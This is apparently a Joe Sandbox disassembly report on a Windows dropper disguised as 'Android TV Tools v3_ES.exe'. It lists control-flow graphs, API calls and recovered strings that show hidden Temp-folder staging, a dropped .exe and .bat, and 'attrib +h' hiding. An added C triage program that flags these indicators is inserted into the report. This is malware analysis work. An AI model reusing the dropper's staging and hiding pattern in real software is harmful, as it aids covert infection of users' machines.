                        control_flow_graph 0 401000-401263 call 405810 call 404d37 GetStdHandle GetModuleFileNameA call 405790 7 401274-40127b 0->7 8 4012c7-4013d3 call 4056a0 call 403575 call 4056a0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 7->8 9 40127d-40129f call 403635 call 4035d1 7->9 63 4013e4-4013eb 8->63 19 4012a1-4012c3 call 403762 call 4056a0 9->19 20 4012c5 9->20 19->8 20->7 64 40141b-401be8 call 4056a0 * 2 GetTempPathA call 403762 call 4056a0 call 403575 * 7 call 40563f call 4056a0 call 403575 call 4056b0 * 2 call 403575 call 4056b0 * 2 call 403575 call 4056b0 * 2 call 403575 call 4056b0 call 4055a9 call 403575 * 4 call 40563f call 4056a0 call 403575 call 4056b0 * 2 call 403575 call 4056b0 * 2 call 403575 call 4056b0 * 2 call 403575 call 4056b0 call 4055a9 call 40563f call 4055a9 call 403217 call 40563f call 4056a0 * 2 call 403217 call 40563f * 2 call 403575 call 4056a0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056a0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 40563f * 2 call 403575 call 4056a0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 4056a0 call 403575 * 8 call 40563f call 403575 * 4 call 40563f call 403575 * 3 call 40563f 63->64 65 4013ed-401419 call 403635 call 4035d1 63->65 341 401d70-401e42 call 403575 * 12 call 
40563f call 401ef5 call 4055a9 64->341 342 401bee-401c15 64->342 65->63 414 401e47-401e56 341->414 346 401c1b-401c2f 342->346 347 401d4c-401d6d call 4056b0 * 2 342->347 349 401c40-401c5e call 405790 346->349 347->341 358 401c60-401c94 call 403635 call 4035d1 349->358 359 401ca2-401ca9 349->359 386 401ca0 358->386 387 401c96 358->387 361 401d12-401d19 359->361 362 401cab-401cb2 359->362 365 401d1b-401d2a call 4056b0 361->365 366 401d2d-401d44 call 4056b0 361->366 367 401cb4-401cc3 call 4056b0 362->367 368 401cc6-401d10 call 403575 call 4056b0 * 2 call 403575 call 4056b0 362->368 365->366 383 401d47 366->383 367->368 368->383 383->347 386->349 387->386 415 401ea0-401eaf 414->415 416 401e58-401e62 414->416 417 401ec0-401ecc 415->417 418 401e73-401e82 416->418 420 401eeb-401ef4 417->420 421 401ece-401ee9 call 4055a9 417->421 418->415 419 401e84-401e9e call 4055a9 418->419 419->418 421->417
                        APIs
                        • GetStdHandle.KERNEL32(000000F5), ref: 00401223
                        • GetModuleFileNameA.KERNEL32(00000000,00413298,00000104), ref: 0040123A
                        • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\), ref: 00401455
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: FileHandleModuleNamePathTemp
                        • String ID: $ 389816$ 389816$ mkdir $ mkdir $%s%s$%s%s$%s%s$%s%s$%s%s%s$%s%s%s%s$%s%s%s%s%s$%s%s%s%s%s$%s%s%s%s%s$%s%s%s%s%s%s%s%s$%s%s%s%s%s%s%s%s$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$.bat$.exe$@echo off$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\afolder$C:\Users\user\AppData\Local\Temp\ytmp$C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe$C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat$C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe"$SativaSmok$attrib +h $if not exist $if not exist $set cmdline=
                        • API String ID: 582120069-4044924319
                        • Opcode ID: 463d37616fd5927b5e3275e9d21ef53b86b473988ab558a244dd7b08ceaf7d10
                        • Instruction ID: 1f264d1c5fa84f41fc915c775896d5a35dae581fe8400ea8a73f093551c495cf
                        • Opcode Fuzzy Hash: 463d37616fd5927b5e3275e9d21ef53b86b473988ab558a244dd7b08ceaf7d10
                        • Instruction Fuzzy Hash: FB72C7F2D4061476E7106BA1AC07F9B362D9B2131DF4404BAF90D712C2F9BB57684EAB
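The String ID field of the 401000 entry above lists what this function assembles with its %s templates: a directory under the user's Temp folder (ytmp), an .exe and a .bat dropped into it, batch fragments (@echo off, if not exist, mkdir, attrib +h, set cmdline=) and a command line that runs the .bat with the sample's own Desktop path as its argument. The C program below is an added example, not Joe Sandbox or sample code: it parses the $-separated field exactly as the report prints it and reduces it to a set of dropper indicators a triage script can act on. The input string is copied from the field above; the indicator categories and the verdict rule are this example's own.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Indicator categories for this example; not a Joe Sandbox taxonomy. */
enum indicator {
    IND_TEMP_DROP     = 1 << 0, /* a path under \AppData\Local\Temp\        */
    IND_BATCH_SCRIPT  = 1 << 1, /* a .bat file name or an "@echo off" line  */
    IND_HIDE_ATTRIB   = 1 << 2, /* "attrib +h": hides the dropped files     */
    IND_DIR_CREATE    = 1 << 3, /* "mkdir" / "if not exist": makes the dir  */
    IND_CMDLINE_VAR   = 1 << 4, /* "set cmdline=": stores a command line    */
    IND_SELF_RELAUNCH = 1 << 5, /* .bat run with a quoted .exe path as arg  */
    IND_FMT_CONCAT    = 1 << 6  /* "%s%s..." templates used to build paths  */
};

struct triage {
    unsigned flags;   /* OR of enum indicator */
    int      tokens;  /* non-empty strings in the field */
    int      max_fmt; /* longest %s-only template, in arguments */
};

/* Input copied from the String ID line of the 401000 entry above. */
static const char SAMPLE_STRING_ID[] =
    "$ 389816$ 389816$ mkdir $ mkdir $%s%s$%s%s$%s%s$%s%s$%s%s%s$%s%s%s%s$"
    "%s%s%s%s%s$%s%s%s%s%s$%s%s%s%s%s$%s%s%s%s%s%s%s%s$%s%s%s%s%s%s%s%s$"
    "%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$.bat$.exe$@echo off$"
    "C:\\Users\\user\\AppData\\Local\\Temp\\$"
    "C:\\Users\\user\\AppData\\Local\\Temp\\afolder$"
    "C:\\Users\\user\\AppData\\Local\\Temp\\ytmp$"
    "C:\\Users\\user\\AppData\\Local\\Temp\\ytmp\\tmp4785.exe$"
    "C:\\Users\\user\\AppData\\Local\\Temp\\ytmp\\tmp8939.bat$"
    "C:\\Users\\user\\AppData\\Local\\Temp\\ytmp\\tmp8939.bat "
    "\"C:\\Users\\user\\Desktop\\Android TV Tools v3_ES.exe\"$"
    "SativaSmok$attrib +h $if not exist $if not exist $set cmdline=";

static bool ends_with(const char *s, const char *suf)
{
    size_t ls = strlen(s), lf = strlen(suf);
    return ls >= lf && strcmp(s + ls - lf, suf) == 0;
}

/* Number of "%s" in s if s consists of nothing else, otherwise 0. */
static int fmt_only_count(const char *s)
{
    int n = 0;
    while (s[0] == '%' && s[1] == 's') { s += 2; n++; }
    return *s == '\0' ? n : 0;
}

static void classify(const char *tok, struct triage *t)
{
    int n = fmt_only_count(tok);
    if (n) {
        t->flags |= IND_FMT_CONCAT;
        if (n > t->max_fmt) t->max_fmt = n;
        return;
    }
    if (strstr(tok, "\\AppData\\Local\\Temp\\"))            t->flags |= IND_TEMP_DROP;
    if (ends_with(tok, ".bat") || strstr(tok, "@echo off"))  t->flags |= IND_BATCH_SCRIPT;
    if (strncmp(tok, "attrib +h", 9) == 0)                   t->flags |= IND_HIDE_ATTRIB;
    if (strstr(tok, "mkdir") || strstr(tok, "if not exist")) t->flags |= IND_DIR_CREATE;
    if (strncmp(tok, "set cmdline=", 12) == 0)               t->flags |= IND_CMDLINE_VAR;
    /* '<path>.bat "<path>.exe"': the script is handed an executable path. */
    if (strstr(tok, ".bat \"") && ends_with(tok, ".exe\""))   t->flags |= IND_SELF_RELAUNCH;
}

/* Split the report's $-separated field and classify each string. strtok
   drops empty tokens, so the leading "$" yields nothing; spaces inside
   strings (" 389816", "attrib +h ") are kept as the report has them. */
struct triage triage_string_id(const char *field)
{
    struct triage t = { 0, 0, 0 };
    char buf[4096];
    strncpy(buf, field, sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';
    for (char *tok = strtok(buf, "$"); tok; tok = strtok(NULL, "$")) {
        t.tokens++;
        classify(tok, &t);
    }
    return t;
}

/* Verdict rule for this example: a Temp-path drop plus a batch script that
   is launched with an executable path is treated as a batch dropper. */
bool looks_like_batch_dropper(const struct triage *t)
{
    unsigned need = IND_TEMP_DROP | IND_BATCH_SCRIPT | IND_SELF_RELAUNCH;
    return (t->flags & need) == need;
}

bool sample_is_batch_dropper(void)
{
    struct triage t = triage_string_id(SAMPLE_STRING_ID);
    return looks_like_batch_dropper(&t);
}

int main(void)
{
    struct triage t = triage_string_id(SAMPLE_STRING_ID);
    printf("tokens=%d flags=0x%02x max_fmt=%d dropper=%s\n", t.tokens, t.flags,
           t.max_fmt, looks_like_batch_dropper(&t) ? "yes" : "no");
    return 0;
}
```

The 20-argument %s template is the most telling single string: the function builds its paths and batch lines by concatenation rather than carrying them as literals, which is why the complete batch text never appears in the static strings and only the fragments do. Keep the verdict rule conservative; "attrib +h" and "mkdir" on their own also occur in benign installer scripts.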

                        Control-flow Graph

                        control_flow_graph 736 40b7ec-40b81d 737 40b85f-40b864 736->737 738 40b81f-40b832 CompareStringW 736->738 741 40b876-40b879 737->741 742 40b866-40b873 call 40ba69 737->742 739 40b834-40b83a 738->739 740 40b83c-40b84f CompareStringA 738->740 739->737 745 40ba55 740->745 746 40b855 740->746 743 40b88b-40b893 741->743 744 40b87b-40b888 call 40ba69 741->744 742->741 749 40b8b0-40b8b2 743->749 750 40b895-40b8ab CompareStringA 743->750 744->743 752 40ba57-40ba68 745->752 746->737 749->745 754 40b8b8-40b8bb 749->754 750->752 755 40b8c5-40b8c7 754->755 756 40b8bd-40b8c2 754->756 757 40b8d2-40b8d5 755->757 758 40b8c9-40b8cc 755->758 756->755 760 40b8d7 757->760 761 40b8df-40b8e2 757->761 758->757 759 40b96a-40b980 MultiByteToWideChar 758->759 759->745 762 40b986-40b9bc call 405810 759->762 763 40b8d9-40b8da 760->763 764 40b8e4-40b8e6 761->764 765 40b8eb-40b8ed 761->765 762->745 775 40b9c2-40b9da MultiByteToWideChar 762->775 763->752 764->752 766 40b930-40b932 765->766 767 40b8ef-40b8fe GetCPInfo 765->767 766->763 767->745 769 40b904-40b906 767->769 771 40b934-40b937 769->771 772 40b908-40b90c 769->772 771->759 776 40b939-40b93d 771->776 772->766 774 40b90e-40b914 772->774 774->766 777 40b916-40b91b 774->777 775->745 778 40b9dc-40b9f2 MultiByteToWideChar 775->778 776->764 779 40b93f-40b945 776->779 777->766 780 40b91d-40b924 777->780 778->745 781 40b9f4-40ba26 call 405810 778->781 779->764 782 40b947-40b94c 779->782 783 40b926-40b928 780->783 784 40b92a-40b92e 780->784 781->745 792 40ba28-40ba3d MultiByteToWideChar 781->792 782->764 786 40b94e-40b955 782->786 783->760 783->784 784->766 784->777 788 40b957-40b959 786->788 789 40b95f-40b963 786->789 788->760 788->789 789->782 790 40b965 789->790 790->764 792->745 793 40ba3f-40ba53 CompareStringW 792->793 793->752
                        APIs
                        • CompareStringW.KERNEL32(00000000,00000000,0040D514,00000001,0040D514,00000001,00000000,01490DEC,?,00000000,?,00406910,00000000,?,00000000,?), ref: 0040B82A
                        • CompareStringA.KERNEL32(00000000,00000000,0040D510,00000001,0040D510,00000001,?,00406910,00000000,?,00000000,?), ref: 0040B847
                        • CompareStringA.KERNEL32(?,004055BA,00000000,?,?,00000000,00000000,01490DEC,?,00000000,?,00406910,00000000,?,00000000,?), ref: 0040B8A5
                        • GetCPInfo.KERNEL32(?,00000000,00000000,01490DEC,?,00000000,?,00406910,00000000,?,00000000,?), ref: 0040B8F6
                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,?,00406910,00000000,?,00000000,?), ref: 0040B975
                        • MultiByteToWideChar.KERNEL32(?,00000001,00000000,00000000,00000000,00000000,?,00406910,00000000,?,00000000,?), ref: 0040B9D6
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,00000000,?,00406910,00000000,?,00000000,?), ref: 0040B9E9
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,00406910,00000000,?,00000000,?), ref: 0040BA35
                        • CompareStringW.KERNEL32(?,004055BA,00000000,00000000,?,00000000,?,00000000,?,00406910,00000000,?,00000000,?), ref: 0040BA4D
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: ByteCharCompareMultiStringWide$Info
                        • String ID:
                        • API String ID: 1651298574-0
                        • Opcode ID: 1febd849295bec1ab59561060e3b41c03fe70713722d6c16647b5fdedf78774c
                        • Instruction ID: 8202621e738749456c253d6a474982a5d9dbd0abdc63befaa9d84c019e8fc6d1
                        • Opcode Fuzzy Hash: 1febd849295bec1ab59561060e3b41c03fe70713722d6c16647b5fdedf78774c
                        • Instruction Fuzzy Hash: CB71AD72A00249AFCF21AF948C45AEF7BB9EB05314F14803BF955B22A0D3398D55DB9D

                        Control-flow Graph

                        control_flow_graph 794 40a78c-40a7a7 795 40a7b2-40a7b6 794->795 796 40a7a9-40a7b0 794->796 797 40a7bd-40a7c4 795->797 796->797 798 40a7c6-40a7c9 797->798 799 40a7d7-40a7e0 797->799 800 40a7d3 798->800 801 40a7cb-40a7d1 798->801 802 40a7e2-40a7e3 799->802 803 40a80f 799->803 800->799 801->799 801->800 804 40a7e5-40a7e6 802->804 805 40a806-40a80d 802->805 806 40a816-40a81c 803->806 807 40a7e8-40a7f8 804->807 808 40a7fd-40a804 804->808 805->806 809 40a844 806->809 810 40a81e-40a821 806->810 812 40aa22-40aa25 807->812 808->806 811 40a847-40a85a 809->811 813 40a823-40a826 810->813 814 40a83b-40a842 810->814 815 40a891-40a897 811->815 816 40a85c 811->816 817 40aa40-40aa44 812->817 818 40a832-40a839 813->818 819 40a828-40a82b 813->819 814->811 822 40a8b3 815->822 823 40a899-40a89f 815->823 820 40a88c-40a88f 816->820 821 40a85e-40a860 816->821 818->811 819->807 824 40a82d-40a830 819->824 825 40a8ba-40a8c4 820->825 821->820 826 40a862-40a864 821->826 822->825 827 40a8a1-40a8a3 823->827 828 40a8aa-40a8b1 823->828 824->811 829 40a8c6-40a8d4 825->829 830 40a8d9-40a8db 825->830 831 40a883-40a88a 826->831 832 40a866-40a86c 826->832 827->822 833 40a8a5 827->833 828->825 829->830 834 40a8d6-40a8d8 829->834 835 40a8e7-40a8ea 830->835 836 40a8dd-40a8e3 830->836 831->825 832->828 837 40a86e-40a874 832->837 833->807 834->830 838 40a8ec 835->838 839 40a8ee-40a8f0 835->839 836->835 837->807 840 40a87a-40a881 837->840 838->839 841 40a8f2-40a8f8 839->841 842 40a8fa-40a8fc 839->842 840->825 843 40a904-40a910 call 40a354 841->843 842->843 844 40a8fe 842->844 847 40a912-40a923 843->847 848 40a925-40a942 CreateFileA 843->848 844->843 849 40a963-40a965 847->849 850 40a944-40a94d GetFileType 848->850 851 40a956-40a962 GetLastError call 409272 848->851 849->817 852 40a96a-40a96d 850->852 853 40a94f-40a950 CloseHandle 850->853 851->849 856 40a975-40a978 852->856 857 40a96f-40a973 852->857 853->851 858 40a97e-40a9ad call 40a3e9 856->858 859 40a97a 856->859 857->858 862 40aa27-40aa2b 858->862 863 40a9af-40a9b1 858->863 859->858 865 40aa2d-40aa31 862->865 866 40aa3e 862->866 863->862 864 40a9b3-40a9b7 863->864 864->862 867 40a9b9-40a9cc call 407522 864->867 865->866 868 40aa33-40aa3a 865->868 866->817 871 40a9dc-40a9f1 call 407a37 867->871 872 40a9ce-40a9d8 867->872 868->866 878 40a9f3-40a9f7 871->878 879 40aa09-40aa19 call 407522 871->879 872->862 873 40a9da 872->873 875 40aa1b-40aa1c call 407337 873->875 880 40aa21 875->880 878->879 881 40a9f9-40aa07 call 40bcda 878->881 879->862 879->875 880->812 881->875 881->879
                        APIs
                        • CreateFileA.KERNELBASE(00000001,80000000,00000040,0000000C,00000001,00000080,00000000,00000041,?,00000000), ref: 0040A938
                        • GetFileType.KERNELBASE(00000000), ref: 0040A945
                        • CloseHandle.KERNEL32(00000000), ref: 0040A950
                        • GetLastError.KERNEL32 ref: 0040A956
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: File$CloseCreateErrorHandleLastType
                        • String ID: @$H
                        • API String ID: 1809617866-104103126
                        • Opcode ID: b2e6a79cf8b840c5e042042894f39d002ec681136d129e220ea756b77ed9d5fc
                        • Instruction ID: adf26b6370af484567565b22fdbdb287164912d56f4e7350506426c4a6c7ea82
                        • Opcode Fuzzy Hash: b2e6a79cf8b840c5e042042894f39d002ec681136d129e220ea756b77ed9d5fc
                        • Instruction Fuzzy Hash: 73811672E043459AEF249B6889447EE7B60AB01368F14C13BE9517B3C1D3BC8966DB4B

                        Control-flow Graph

                        control_flow_graph 886 408e8f-408ea6 887 408ea8-408eab 886->887 888 408ebd-408ec0 886->888 887->888 889 408ead 887->889 890 408ec3-408ec7 888->890 891 408edf-408eef 889->891 892 408eaf-408eb2 889->892 893 408ef4-408f10 call 40b200 890->893 894 408ec9-408ecd 890->894 897 409010-409013 891->897 892->888 895 408eb4-408eb7 892->895 903 408f12 893->903 904 408f33-408f5b call 40a56e 893->904 894->894 896 408ecf-408ed6 894->896 895->891 899 408eb9 895->899 896->890 901 408ed8-408edd 896->901 900 409069-40906d 897->900 899->888 901->890 905 408f15-408f2b 903->905 909 408f94-408f98 904->909 910 408f5d-408f76 904->910 905->904 907 408f2d-408f31 905->907 907->904 907->905 913 408fc7-409007 CreateProcessA GetLastError call 407308 909->913 914 408f9a-408f9f 909->914 911 408f80-408f83 910->911 912 408f78-408f7e 910->912 916 408f86-408f8d 911->916 912->916 923 409015-409019 913->923 924 409009-40900f call 409272 913->924 917 408fa3-408fa6 914->917 916->910 919 408f8f-408f92 916->919 920 408fa8-408faa 917->920 921 408fac-408fae 917->921 919->909 922 408faf-408fb1 920->922 921->922 925 408fc0 922->925 926 408fb3-408fbe 922->926 928 409021-40902a 923->928 929 40901b-40901c call 405dca 923->929 924->897 925->913 926->917 932 40904b-40904f 928->932 933 40902c-409049 WaitForSingleObject GetExitCodeProcess CloseHandle 928->933 929->928 934 409051-409059 CloseHandle 932->934 935 40905b-40905e 932->935 936 409061-409066 CloseHandle 933->936 934->936 935->936 936->900
                        APIs
                        • CreateProcessA.KERNELBASE(004067F3,004067F3,00000000,00000000,00000001,000000FF,0040D108,00000000,?,?,0040D108,00000000,0040E414), ref: 00408FEC
                        • GetLastError.KERNEL32 ref: 00408FF4
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00409031
                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 0040903E
                        • CloseHandle.KERNEL32(?), ref: 00409047
                        • CloseHandle.KERNEL32(?), ref: 00409054
                        • CloseHandle.KERNEL32(0040684F), ref: 00409064
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: CloseHandle$Process$CodeCreateErrorExitLastObjectSingleWait
                        • String ID:
                        • API String ID: 966596688-0
                        • Opcode ID: c5a49d4fad8cc15bb5dc8a8dd04d4969f40e02af60581ae3535133ee7cc71e77
                        • Instruction ID: f038399a60921c0561f0a6f99f2b11a9d98f7d6fd060fb6637cb1a89438f4955
                        • Opcode Fuzzy Hash: c5a49d4fad8cc15bb5dc8a8dd04d4969f40e02af60581ae3535133ee7cc71e77
                        • Instruction Fuzzy Hash: 63511030D042099FDB218F64CD44AEEBBB5EB85314F10847FE4A5BB2D2CB799806CB58

                        Control-flow Graph

                        control_flow_graph 937 4075bc-4075d2 call 408da8 940 4075d4-4075db call 406523 937->940 941 4075dc-4075ec 937->941 940->941 943 4075f2-4075f4 941->943 944 407610-407621 GetStartupInfoA 943->944 945 4075f6-40760e 943->945 947 407627-40762d 944->947 948 4076ec 944->948 945->943 947->948 949 407633-407642 947->949 950 4076ee-4076fa 948->950 951 407644 949->951 952 407646-40764c 949->952 953 407749 950->953 954 4076fc-407702 950->954 951->952 956 4076a0-4076a4 952->956 957 40764e 952->957 955 40774d-407751 953->955 958 407704-407707 954->958 959 407709-407710 954->959 955->950 961 407753-407766 SetHandleCount 955->961 956->948 960 4076a6-4076ab 956->960 962 407653-407660 call 408da8 957->962 963 407713-40771f GetStdHandle 958->963 959->963 964 4076e3-4076ea 960->964 965 4076ad-4076b3 960->965 974 407662-40766b 962->974 975 40769a 962->975 967 407721-40772a GetFileType 963->967 968 407738-40773c 963->968 964->948 964->960 965->964 969 4076b5-4076b8 965->969 967->968 971 40772c-407736 967->971 968->955 972 4076c5-4076e0 969->972 973 4076ba-4076c3 GetFileType 969->973 971->968 976 40773e-407741 971->976 972->964 973->964 973->972 978 407671-407673 974->978 975->956 976->955 977 407743-407747 976->977 977->955 979 407675-40768b 978->979 980 40768d-407696 978->980 979->978 980->962 981 407698 980->981 981->956
                        APIs
                        • GetStartupInfoA.KERNEL32(?), ref: 00407615
                        • GetFileType.KERNEL32(00000800), ref: 004076BB
                        • GetStdHandle.KERNEL32(-000000F6), ref: 00407714
                        • GetFileType.KERNELBASE(00000000), ref: 00407722
                        • SetHandleCount.KERNEL32 ref: 00407759
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: FileHandleType$CountInfoStartup
                        • String ID:
                        • API String ID: 1710529072-0
                        • Opcode ID: 94766c67cce12e496a6129a5d9d2d5104d7cb2a8cdf1c8256d655f198b1c79a6
                        • Instruction ID: dd20ea5e2ad15785f978a9490fc45cc3bf13d48b7b8c0b4060476bf1d8323b67
                        • Opcode Fuzzy Hash: 94766c67cce12e496a6129a5d9d2d5104d7cb2a8cdf1c8256d655f198b1c79a6
                        • Instruction Fuzzy Hash: 50512331D086058BD7208B2CCD487663B90BB12374F194E3AE4A6AB3E1D779F849D75A

                        Control-flow Graph

                        control_flow_graph 982 407a37-407a49 983 407c14-407c1b 982->983 984 407a4f-407a70 982->984 985 407c25 983->985 984->983 986 407a76-407a83 984->986 987 407c28-407c2c 985->987 988 407a85-407a88 986->988 989 407aec-407aee 986->989 988->989 990 407a8a-407a8d 988->990 989->987 991 407aac-407ac3 ReadFile 990->991 992 407a8f-407a94 990->992 994 407ac5-407ad0 GetLastError 991->994 995 407aff-407b11 991->995 992->991 993 407a96-407aa7 992->993 993->991 996 407ad2-407ae2 994->996 997 407ae7-407aea 994->997 998 407b17-407b19 995->998 999 407c0f-407c12 995->999 996->985 997->989 1000 407af3-407afa call 409272 997->1000 1001 407b24 998->1001 1002 407b1b-407b1e 998->1002 999->987 1000->985 1005 407b26-407b38 1001->1005 1002->1001 1004 407b20-407b22 1002->1004 1004->1005 1007 407c09-407c0c 1005->1007 1008 407b3e-407b45 1005->1008 1007->999 1009 407bf9-407c03 1008->1009 1010 407b4b-407b4d 1008->1010 1009->1007 1011 407c05-407c07 1009->1011 1012 407b5a-407b5e 1010->1012 1013 407b4f-407b55 1010->1013 1011->1007 1014 407b60-407b67 1012->1014 1015 407b78-407b94 ReadFile 1012->1015 1016 407beb-407bf1 1013->1016 1017 407b69-407b6d 1014->1017 1018 407b6f-407b76 1014->1018 1020 407ba0-407ba4 1015->1020 1021 407b96-407b9e GetLastError 1015->1021 1016->1008 1019 407bf7 1016->1019 1022 407bcd-407bd0 1017->1022 1018->1016 1019->1007 1023 407be7 1020->1023 1024 407ba6-407bad 1020->1024 1021->1020 1021->1023 1025 407bea 1022->1025 1023->1025 1026 407bc2-407bc5 1024->1026 1027 407baf-407bb4 1024->1027 1025->1016 1029 407bd2-407be5 call 407522 1026->1029 1030 407bc7-407bcb 1026->1030 1027->1022 1028 407bb6-407bc0 1027->1028 1028->1016 1029->1016 1029->1023 1030->1022 1030->1029
                        APIs (two ReadFile calls, each followed by a GetLastError check; the second reads a single byte, 00000001, a pattern consistent with the C runtime's _read and its text-mode lookahead after a carriage return)
                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000100,00000000), ref: 00407ABB
                        • GetLastError.KERNEL32 ref: 00407AC5
                        • ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 00407B8C
